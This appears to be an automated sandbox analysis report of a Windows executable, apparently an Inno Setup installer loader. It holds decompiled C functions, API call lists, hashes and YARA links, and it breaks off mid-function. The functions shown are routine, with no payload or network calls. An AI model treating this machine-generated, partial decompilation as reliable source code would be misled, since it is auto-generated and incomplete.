                                                            Download Yara Rule
                                                            C-Code - Quality: 73%
                                                            			E004AEFE8(void* __eax, long __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char* _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				int _t30;
				intOrPtr _t63;
				void* _t71;
				void* _t73;
				intOrPtr _t75;
				intOrPtr _t76;

				_t71 = __edi;
				_t54 = __ebx;
				_t75 = _t76;
				_t55 = 4;
				do {
					_push(0);
					_push(0);
					_t55 = _t55 - 1;
				} while (_t55 != 0);
				_push(_t55);
				_push(__ebx);
				_t73 = __eax;
				_t78 = 0;
				_push(_t75);
				_push(0x4af0e1);
				_push( *[fs:eax]);
				 *[fs:eax] = _t76;
				while(1) {
					E00422D70( &_v12, _t54, _t55, _t78); // executed
					_t55 = L".tmp";
					E004AEEC8(0, _t54, L".tmp", _v12, _t71, _t73,  &_v8); // executed
					_t30 = CreateDirectoryW(E004084EC(_v8), 0); // executed
					if(_t30 != 0) {
						break;
					}
					_t54 = GetLastError();
					_t78 = _t54 - 0xb7;
					if(_t54 != 0xb7) {
						E00426F08(0x3d,  &_v32, _v8);
						_v28 = _v32;
						E00419E18( &_v36, _t54, 0);
						_v24 = _v36;
						E004232EC(_t54,  &_v40);
						_v20 = _v40;
						E00426ED8(0x81, 2,  &_v28,  &_v16);
						_t55 = _v16;
						E0041F264(_v16, 1);
						E0040711C();
					}
				}
				E00407E00(_t73, _v8);
				__eflags = 0;
				_pop(_t63);
				 *[fs:eax] = _t63;
				_push(E004AF0E8);
				E00407A80( &_v40, 3);
				return E00407A80( &_v16, 3);
			}


















                                                            0x004aefe8
                                                            0x004aefe8
                                                            0x004aefe9
                                                            0x004aefeb
                                                            0x004aeff0
                                                            0x004aeff0
                                                            0x004aeff2
                                                            0x004aeff4
                                                            0x004aeff4
                                                            0x004aeff7
                                                            0x004aeff8
                                                            0x004aeffa
                                                            0x004aeffc
                                                            0x004aeffe
                                                            0x004aefff
                                                            0x004af004
                                                            0x004af007
                                                            0x004af00a
                                                            0x004af011
                                                            0x004af019
                                                            0x004af020
                                                            0x004af030
                                                            0x004af037
                                                            0x00000000
                                                            0x00000000
                                                            0x004af03e
                                                            0x004af040
                                                            0x004af046
                                                            0x004af056
                                                            0x004af05e
                                                            0x004af06a
                                                            0x004af072
                                                            0x004af07a
                                                            0x004af082
                                                            0x004af091
                                                            0x004af096
                                                            0x004af0a0
                                                            0x004af0a5
                                                            0x004af0a5
                                                            0x004af046
                                                            0x004af0b4
                                                            0x004af0b9
                                                            0x004af0bb
                                                            0x004af0be
                                                            0x004af0c1
                                                            0x004af0ce
                                                            0x004af0e0

                                                            APIs
                                                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF030
                                                            • GetLastError.KERNEL32(00000000,00000000,?,00000000,004AF0E1,?,?,?,00000003,00000000,00000000,?,004B619F), ref: 004AF039
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID: .tmp
                                                            • API String ID: 1375471231-2986845003
                                                            • Opcode ID: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                            • Instruction ID: 89b964d67460c442e7c67535b057b8112791baa86db9a38931a927ffd746d2a8
                                                            • Opcode Fuzzy Hash: b866ae3ac5566b90e4d091c6d0119bd5c5d6e6cd69059738e462e2ab807557f0
                                                            • Instruction Fuzzy Hash: 3A218735A041089BDB00EBE1C842ADFB3B9EB49304F50447BF800F7381DA386E058BA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040E450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040E450(long __eax, WCHAR* __edx, void* _a4, struct HINSTANCE__* _a8, struct HMENU__* _a12, struct HWND__* _a16, int _a20, int _a24, int _a28, int _a32, long _a36) {
				WCHAR* _v8;
				void* _t13;
				struct HWND__* _t24;
				WCHAR* _t29;
				long _t32;

				_v8 = _t29;
				_t32 = __eax;
				_t13 = E00405740();
				_t24 = CreateWindowExW(_t32, __edx, _v8, _a36, _a32, _a28, _a24, _a20, _a16, _a12, _a8, _a4); // executed
				E00405730(_t13);
				return _t24;
			}








                                                            0x0040e457
                                                            0x0040e45c
                                                            0x0040e45e
                                                            0x0040e48f
                                                            0x0040e498
                                                            0x0040e4a4

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID: InnoSetupLdrWindow$STATIC
                                                            • API String ID: 716092398-2209255943
                                                            • Opcode ID: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                            • Instruction ID: 770f17d29583ffea265d4876c6cd55b491c436ce5e2cc0b006eebdc9bc405b2a
                                                            • Opcode Fuzzy Hash: 4ba199ab3c1e041c72a50ebd66c3ee798d5f8225e8fee486b5eb3d70e3749009
                                                            • Instruction Fuzzy Hash: 73F07FB6600118AF9B84DE9EDC85E9B77ECEB4D264B05412ABA08E7201D634ED118BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004AF1B4, Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004AF1B4(long __eax, intOrPtr __edx, long _a4, long _a8) {
				intOrPtr _v8;
				long _t5;
				long _t9;
				void* _t10;
				void* _t13;
				void* _t15;
				void* _t16;

				_t5 = __eax;
				_v8 = __edx;
				_t9 = __eax;
				_t15 = _t10 - 1;
				if(_t15 < 0) {
					L10:
					return _t5;
				}
				_t16 = _t15 + 1;
				_t13 = 0;
				while(1) {
					_t19 = _t13 - 1;
					if(_t13 != 1) {
						__eflags = _t13 - 1;
						if(__eflags > 0) {
							Sleep(_a4);
						}
					} else {
						Sleep(_a8);
					}
					_t5 = E00427154(_t9, _v8, _t19); // executed
					if(_t5 != 0) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 2) {
						goto L10;
					}
					_t5 = GetLastError();
					if(_t5 == 3) {
						goto L10;
					}
					_t13 = _t13 + 1;
					_t16 = _t16 - 1;
					if(_t16 != 0) {
						continue;
					}
					goto L10;
				}
				goto L10;
			}










                                                            0x004af1b4
                                                            0x004af1bb
                                                            0x004af1be
                                                            0x004af1c2
                                                            0x004af1c5
                                                            0x004af213
                                                            0x004af213
                                                            0x004af213
                                                            0x004af1c7
                                                            0x004af1c8
                                                            0x004af1ca
                                                            0x004af1ca
                                                            0x004af1cd
                                                            0x004af1da
                                                            0x004af1dd
                                                            0x004af1e3
                                                            0x004af1e3
                                                            0x004af1cf
                                                            0x004af1d3
                                                            0x004af1d3
                                                            0x004af1ed
                                                            0x004af1f4
                                                            0x00000000
                                                            0x00000000
                                                            0x004af1f6
                                                            0x004af1fe
                                                            0x00000000
                                                            0x00000000
                                                            0x004af200
                                                            0x004af208
                                                            0x00000000
                                                            0x00000000
                                                            0x004af20a
                                                            0x004af20b
                                                            0x004af20c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004af20c
                                                            0x00000000

                                                            APIs
                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1D3
                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1E3
                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF1F6
                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,004B64EC,000000FA,00000032,004B6554), ref: 004AF200
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLastSleep
                                                            • String ID:
                                                            • API String ID: 1458359878-0
                                                            • Opcode ID: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                            • Instruction ID: c6a2870ed3ca6a3ef6dac7de38143878fdab2d33d6efdb0808b7300bb595a527
                                                            • Opcode Fuzzy Hash: 132a67e1d44d9774a6928004e5d8cee8820d44842addde93f31c36794548402b
                                                            • Instruction Fuzzy Hash: 0CF02B37B04224A76724A5EBEC46D6FE298DEB33A8710457BFC04D7302C439CC4542A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041FF94, Relevance: 4.6, APIs: 3, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 63%
                                                            			E0041FF94(void* __eax, void* __ebx, signed int* __ecx, signed int* __edx, void* __edi, void* __esi, signed int* _a4) {
				char _v8;
				char _v9;
				int _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _t33;
				int _t43;
				int _t64;
				intOrPtr _t72;
				intOrPtr _t74;
				signed int* _t77;
				signed int* _t79;
				void* _t81;
				void* _t82;
				intOrPtr _t83;

				_t81 = _t82;
				_t83 = _t82 + 0xffffffe8;
				_v8 = 0;
				_t77 = __ecx;
				_t79 = __edx;
				_push(_t81);
				_push(0x420094);
				_push( *[fs:eax]);
				 *[fs:eax] = _t83;
				_v9 = 0;
				E00407E48( &_v8, __eax);
				E00407FB0( &_v8);
				_t33 = GetFileVersionInfoSizeW(E004084EC(_v8),  &_v16); // executed
				_t64 = _t33;
				if(_t64 == 0) {
					_pop(_t72);
					 *[fs:eax] = _t72;
					_push(0x42009b);
					return E00407A20( &_v8);
				} else {
					_v20 = E004053F0(_t64);
					_push(_t81);
					_push(0x420077);
					_push( *[fs:edx]);
					 *[fs:edx] = _t83;
					_t43 = GetFileVersionInfoW(E004084EC(_v8), _v16, _t64, _v20); // executed
					if(_t43 != 0 && VerQueryValueW(_v20, 0x4200a8,  &_v24,  &_v28) != 0) {
						 *_t79 =  *(_v24 + 0x10) >> 0x00000010 & 0x0000ffff;
						 *_t77 =  *(_v24 + 0x10) & 0x0000ffff;
						 *_a4 =  *(_v24 + 0x14) >> 0x00000010 & 0x0000ffff;
						_v9 = 1;
					}
					_pop(_t74);
					 *[fs:eax] = _t74;
					_push(0x42007e);
					return E0040540C(_v20);
				}
			}



















                                                            0x0041ff95
                                                            0x0041ff97
                                                            0x0041ff9f
                                                            0x0041ffa2
                                                            0x0041ffa4
                                                            0x0041ffaa
                                                            0x0041ffab
                                                            0x0041ffb0
                                                            0x0041ffb3
                                                            0x0041ffb6
                                                            0x0041ffbf
                                                            0x0041ffc7
                                                            0x0041ffd9
                                                            0x0041ffde
                                                            0x0041ffe2
                                                            0x00420080
                                                            0x00420083
                                                            0x00420086
                                                            0x00420093
                                                            0x0041ffe8
                                                            0x0041ffef
                                                            0x0041fff4
                                                            0x0041fff5
                                                            0x0041fffa
                                                            0x0041fffd
                                                            0x00420012
                                                            0x00420019
                                                            0x00420041
                                                            0x0042004a
                                                            0x0042005b
                                                            0x0042005d
                                                            0x0042005d
                                                            0x00420063
                                                            0x00420066
                                                            0x00420069
                                                            0x00420076
                                                            0x00420076

                                                            APIs
                                                            • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00420094), ref: 0041FFD9
                                                            • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 00420012
                                                            • VerQueryValueW.VERSION(?,004200A8,?,?,00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 0042002C
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileInfoVersion$QuerySizeValue
                                                            • String ID:
                                                            • API String ID: 2179348866-0
                                                            • Opcode ID: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                            • Instruction ID: 087fa93cc02b824bee97242c1a4c1e6fbe52d07f241be95d6751b2a9bfa32856
                                                            • Opcode Fuzzy Hash: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                            • Instruction Fuzzy Hash: 19314771A042199FD710DFA9D941DAFB7F8EB48700B91447AF944E3252D778DD00C765
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040B110, Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 72%
                                                            			E0040B110(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t41;
				signed short _t43;
				signed short _t46;
				signed int _t60;
				intOrPtr _t68;
				void* _t79;
				signed int* _t81;
				intOrPtr _t84;

				_t79 = __edi;
				_t61 = __ecx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t81 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				E00407B04(_v12);
				_push(_t84);
				_push(0x40b227);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				E00407A20(__ecx);
				if(_v12 == 0) {
					L14:
					_pop(_t68);
					 *[fs:eax] = _t68;
					_push(E0040B22E);
					return E00407A80( &_v28, 6);
				}
				E00407E48( &_v20, _v12);
				_t41 = _v12;
				if(_t41 != 0) {
					_t41 =  *(_t41 - 4);
				}
				_t60 = _t41;
				if(_t60 < 1) {
					L7:
					_t43 = E0040AE34(_v8, _t60, _t61,  &_v16, _t81); // executed
					if(_v16 == 0) {
						L00403730();
						E0040A7E4(_t43, _t60,  &_v24, _t79, _t81);
						_t46 = E0040AF60(_v20, _t60, _t81, _v24, _t79, _t81); // executed
						__eflags =  *_t81;
						if( *_t81 == 0) {
							__eflags =  *0x4bdc0c;
							if( *0x4bdc0c == 0) {
								L00403738();
								E0040A7E4(_t46, _t60,  &_v28, _t79, _t81);
								E0040AF60(_v20, _t60, _t81, _v28, _t79, _t81);
							}
						}
						__eflags =  *_t81;
						if(__eflags == 0) {
							E0040B044(_v20, _t60, _t81, __eflags); // executed
						}
					} else {
						E0040AF60(_v20, _t60, _t81, _v16, _t79, _t81);
					}
					goto L14;
				}
				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
					_t60 = _t60 - 1;
					__eflags = _t60;
					if(_t60 != 0) {
						continue;
					}
					goto L7;
				}
				_t61 = _t60;
				E004088AC(_v12, _t60, 1,  &_v20);
				goto L7;
			}

















                                                            0x0040b110
                                                            0x0040b110
                                                            0x0040b113
                                                            0x0040b115
                                                            0x0040b117
                                                            0x0040b119
                                                            0x0040b11b
                                                            0x0040b11d
                                                            0x0040b11f
                                                            0x0040b120
                                                            0x0040b121
                                                            0x0040b123
                                                            0x0040b126
                                                            0x0040b12c
                                                            0x0040b134
                                                            0x0040b13b
                                                            0x0040b13c
                                                            0x0040b141
                                                            0x0040b144
                                                            0x0040b149
                                                            0x0040b152
                                                            0x0040b20c
                                                            0x0040b20e
                                                            0x0040b211
                                                            0x0040b214
                                                            0x0040b226
                                                            0x0040b226
                                                            0x0040b15e
                                                            0x0040b163
                                                            0x0040b168
                                                            0x0040b16d
                                                            0x0040b16d
                                                            0x0040b16f
                                                            0x0040b174
                                                            0x0040b19b
                                                            0x0040b1a1
                                                            0x0040b1aa
                                                            0x0040b1bb
                                                            0x0040b1c3
                                                            0x0040b1d0
                                                            0x0040b1d5
                                                            0x0040b1d8
                                                            0x0040b1da
                                                            0x0040b1e1
                                                            0x0040b1e3
                                                            0x0040b1eb
                                                            0x0040b1f8
                                                            0x0040b1f8
                                                            0x0040b1e1
                                                            0x0040b1fd
                                                            0x0040b200
                                                            0x0040b207
                                                            0x0040b207
                                                            0x0040b1ac
                                                            0x0040b1b4
                                                            0x0040b1b4
                                                            0x00000000
                                                            0x0040b1aa
                                                            0x0040b176
                                                            0x0040b196
                                                            0x0040b197
                                                            0x0040b199
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040b199
                                                            0x0040b185
                                                            0x0040b18f
                                                            0x00000000

                                                            APIs
                                                            • GetUserDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1BB
                                                            • GetSystemDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1E3
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: DefaultLanguage$SystemUser
                                                            • String ID:
                                                            • API String ID: 384301227-0
                                                            • Opcode ID: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                            • Instruction ID: e5bcb09f7540d0846d638ab8db7cc306f2a88a3609992180fc1e837192b0f5a6
                                                            • Opcode Fuzzy Hash: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                            • Instruction Fuzzy Hash: B0313070A142499BDB10EBA5C891AAEB7B5EF48304F50857BE400B73D1DB7CAD41CB9E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040B234, Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 58%
                                                            			E0040B234(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				short _v530;
				char _v536;
				char _v540;
				void* _t44;
				intOrPtr _t45;
				void* _t49;
				void* _t52;

				_v536 = 0;
				_v540 = 0;
				_v8 = 0;
				_t49 = __eax;
				_push(_t52);
				_push(0x40b2ee);
				_push( *[fs:eax]);
				 *[fs:eax] = _t52 + 0xfffffde8;
				GetModuleFileNameW(0,  &_v530, 0x105);
				E00408550( &_v536, _t49);
				_push(_v536);
				E0040858C( &_v540, 0x105,  &_v530);
				_pop(_t44); // executed
				E0040B110(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
				if(_v8 != 0) {
					LoadLibraryExW(E004084EC(_v8), 0, 2);
				}
				_pop(_t45);
				 *[fs:eax] = _t45;
				_push(E0040B2F5);
				E00407A80( &_v540, 2);
				return E00407A20( &_v8);
			}











                                                            0x0040b241
                                                            0x0040b247
                                                            0x0040b24d
                                                            0x0040b250
                                                            0x0040b254
                                                            0x0040b255
                                                            0x0040b25a
                                                            0x0040b25d
                                                            0x0040b270
                                                            0x0040b27d
                                                            0x0040b288
                                                            0x0040b29a
                                                            0x0040b2a8
                                                            0x0040b2a9
                                                            0x0040b2b2
                                                            0x0040b2c1
                                                            0x0040b2c6
                                                            0x0040b2ca
                                                            0x0040b2cd
                                                            0x0040b2d0
                                                            0x0040b2e0
                                                            0x0040b2ed

                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileLibraryLoadModuleName
                                                            • String ID:
                                                            • API String ID: 1159719554-0
                                                            • Opcode ID: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                            • Instruction ID: c66d7809fa1512833e1e01641763b0ecb7dd00f0751393a0e64d94d028879d96
                                                            • Opcode Fuzzy Hash: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                            • Instruction Fuzzy Hash: 35116070A4421CABDB10EB55CD86BDE77B8DB04304F5144BEE508B32C1DA785F848AA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00427154, Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 60%
                                                            			E00427154(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E00427108(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x4271b1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = DeleteFileW(E004084EC(__edx)); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E004271B8);
					return E00427144( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}











                                                            0x00427155
                                                            0x00427157
                                                            0x0042716c
                                                            0x00427177
                                                            0x00427178
                                                            0x0042717d
                                                            0x00427180
                                                            0x0042718b
                                                            0x00427190
                                                            0x00427198
                                                            0x0042719d
                                                            0x004271a0
                                                            0x004271a3
                                                            0x004271b0
                                                            0x0042716e
                                                            0x00427170
                                                            0x004271c9
                                                            0x004271c9

                                                            APIs
                                                            • DeleteFileW.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 0042718B
                                                            • GetLastError.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 00427193
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: DeleteErrorFileLast
                                                            • String ID:
                                                            • API String ID: 2018770650-0
                                                            • Opcode ID: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                            • Instruction ID: b2b9a58b343adce66678156e8009272800f6ed28378062f2bcdc1a6b1bb3db77
                                                            • Opcode Fuzzy Hash: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                            • Instruction Fuzzy Hash: 7AF0C831B08228ABDB01EFB5AC424AEB7E8DF0971479149BBE804E3341E6395D209698
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00421230, Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 37%
                                                            			E00421230(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x4212a2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x421284);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryW(E004084EC(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(0x42128b);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}












                                                            0x00421231
                                                            0x00421233
                                                            0x00421237
                                                            0x0042123a
                                                            0x0042123f
                                                            0x00421244
                                                            0x00421245
                                                            0x0042124a
                                                            0x0042124d
                                                            0x00421250
                                                            0x00421255
                                                            0x00421256
                                                            0x0042125b
                                                            0x0042125e
                                                            0x00421269
                                                            0x0042126e
                                                            0x00421273
                                                            0x00421276
                                                            0x00421279
                                                            0x0042127e
                                                            0x00421280
                                                            0x00421283

                                                            APIs
                                                            • SetErrorMode.KERNEL32 ref: 0042123A
                                                            • LoadLibraryW.KERNEL32(00000000,00000000,00421284,?,00000000,004212A2), ref: 00421269
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: ErrorLibraryLoadMode
                                                            • String ID:
                                                            • API String ID: 2987862817-0
                                                            • Opcode ID: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                            • Instruction ID: 4174928c950a8c4d8a753a2a73b5e5f46ee32f9a8ef6f103d2b3a03bcfaff51e
                                                            • Opcode Fuzzy Hash: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                            • Instruction Fuzzy Hash: 15F08270A14744BFDB115F779C5282BBAACE709B047A348BAF800F2691E53C48208574
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004052D4, Relevance: 2.6, APIs: 2, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004052D4() {
				intOrPtr _t13;
				intOrPtr* _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t28;
				void* _t31;

				_t28 =  *0x004BBADC;
				while(_t28 != 0x4bbad8) {
					_t2 = _t28 + 4; // 0x4bbad8
					VirtualFree(_t28, 0, 0x8000); // executed
					_t28 =  *_t2;
				}
				_t25 = 0x37;
				_t13 = 0x4b7080;
				do {
					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
					 *((intOrPtr*)(_t13 + 8)) = _t13;
					 *((intOrPtr*)(_t13 + 0x10)) = 1;
					 *((intOrPtr*)(_t13 + 0x14)) = 0;
					_t13 = _t13 + 0x20;
					_t25 = _t25 - 1;
				} while (_t25 != 0);
				 *0x4bbad8 = 0x4bbad8;
				 *0x004BBADC = 0x4bbad8;
				_t26 = 0x400;
				_t23 = 0x4bbb78;
				do {
					_t14 = _t23;
